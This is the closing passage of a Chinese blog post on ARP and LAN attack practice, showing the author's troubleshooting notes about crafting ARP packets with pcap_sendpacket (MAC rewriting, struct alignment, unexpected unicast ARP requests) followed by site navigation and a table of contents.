<li>在抓包分析的过程中，发现通过pcap_sendpacket函数打出的ARP包的Ethernet层的Source字段以及ARP层的Sender MAC address字段并不是我自己写进去的值，而是被改成了物理机的MAC地址，目前还不清楚具体原因。<img src="https://s2.loli.net/2023/08/22/eiY6BXj1WQ8fc9b.png" alt="image.png"></li>
<li>代码中请注意取消内存对齐优化（上面代码里的第8，9行），详细可参考这篇文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Tomsidi/article/details/85710667">【C语言踩坑】PCAP发送ARP包之 – 多出的字节</a></li>
<li>理论上ARP请求应该是广播的，但从我抓包的结果来看，还发现了一些单播请求报文，如下图所示，它们是从我的网关路由器向我的设备发送过来的。这个看起来有点不符合常理，既然是单播，那就表明它知道我的MAC地址，事实上在报文帧首也确实有我的MAC地址（只不过这个地址确实是在Ethernet层而非在ARP层），至于为什么，我目前也还没有获得到比较好的答案。不过有一点，RFC标准文档和工业界的具体实现确实是可能存在一定的差异的，这可能与不同厂商的优化手段有关。<img src="https://s2.loli.net/2023/08/20/bV1ETDA7zn2P9mr.png" alt="image.png"></li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/tags/Operating-System/">Operating System</a></li>
        
          <li><a href="/tags/Computer-Networks/">Computer Networks</a></li>
        
          <li><a href="/tags/General-Records/">General Records</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ARP%E6%8A%A5%E6%96%87%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">ARP报文格式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ARP%E5%86%85%E7%BD%91%E6%94%BB%E5%87%BB%E5%AE%9E%E8%B7%B5"><span class="toc-number">2.</span> <span class="toc-text">ARP内网攻击实践</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E5%87%86%E5%A4%87%E8%AE%BE%E5%A4%87"><span class="toc-number">2.1.</span> <span class="toc-text">（一）准备设备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP%E6%B3%9B%E6%B4%AA%E6%94%BB%E5%87%BB"><span class="toc-number">2.2.</span> <span class="toc-text">ARP泛洪攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB"><span class="toc-number">2.3.</span> <span class="toc-text">ARP中间人攻击</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B8%A9%E5%9D%91%E8%A1%A5%E5%85%85"><span class="toc-number">3.</span> <span class="toc-text">踩坑补充</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.chaceq.love/2023/08/21/N01_arp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.chaceq.love/2023/08/21/N01_arp/&text=ARP协议及内网攻击实践"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.chaceq.love/2023/08/21/N01_arp/&title=ARP协议及内网攻击实践"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ARP协议及内网攻击实践&body=Check out this article: https://www.chaceq.love/2023/08/21/N01_arp/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2024
    sqq
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/Operating-System/">Operating System</a></li><!--
     --><!--
       --><li><a href="/tags/Computer-Networks/">Computer Networks</a></li><!--
     --><!--
       --><li><a href="/tags/General-Records/">General Records</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
